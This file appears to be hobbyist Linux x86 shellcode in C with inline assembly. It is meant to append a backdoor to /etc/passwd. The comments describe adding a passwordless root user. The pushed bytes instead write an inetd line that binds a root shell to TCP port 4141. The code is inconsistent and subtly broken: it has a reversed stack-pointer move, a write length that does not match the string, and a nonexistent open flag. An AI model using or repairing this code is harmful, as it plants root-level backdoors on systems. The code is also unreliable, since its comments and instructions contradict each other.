/*
4141 stream tcp nowait root /bin/sh
# this is the pseudo code for open()
	- put the string "/etc/passwd" into ebx
	- put the flags "O_RWONLY | O_APPEND"  into ecx 
	- put 5 into eax # 5 is the syscall # for open() 
	- execute open()

# this is the pseudo code for write()
	- put the string "bob::0:0::/://bin/sh" into ecx
	- move eax into ebx   # after the syscall is completed, 
	  		          # it returns the filedescriptor into eax
	- put 4 into eax      # 4 is the syscall nr of write()
	- put 14 into edx     # 14 is the hex value of 20, which
	                      # is the size of our string 
	- execute syscall

# pseudo code for close() 
	- put 6 into eax      # 6 is close()
	- execute syscall 

*/


void main(){
__asm__("
        //open
        xor    %eax,%eax    #push 0 byte to eax
        xor    %ebx,%ebx    #push 0 byte to ebx
        xor    %ecx,%ecx    #push 0 byte to ebx
        pushl  $0x64777373
        pushl  $0x61702f63
        pushl  $0x74652f2f
        movl   %ebx, %esp
        movw   $0x401, %cx
        mov    $0x5, %al
        int    $0x80
        movl   %eax, %ebx

        //write
        xorl    %eax, %eax
        xorl    %edx, %edx    #clear byte to edx
        pushl $0x68732f6e
        pushl $0x69622f2f
        pushl $0x20746f6f
        pushl $0x72207469
        pushl $0x61776f6e
        pushl $0x20706374
        pushl $0x206d6165
        pushl $0x72747320
        pushl $0x31343134
        mov    %esp, %ecx    #mov contents of esp into ecx
        mov    $0x14,%dl     #reserve 20 bytes for string
        mov    $0x4,%al      #syscall for write
        int    $0x80         #execute the syscall
        xor    %eax,%eax

        //close
        mov $0x6,%al
        int $0x80

        //exit
        mov $0x1, %al
        int $0x80

        
");
}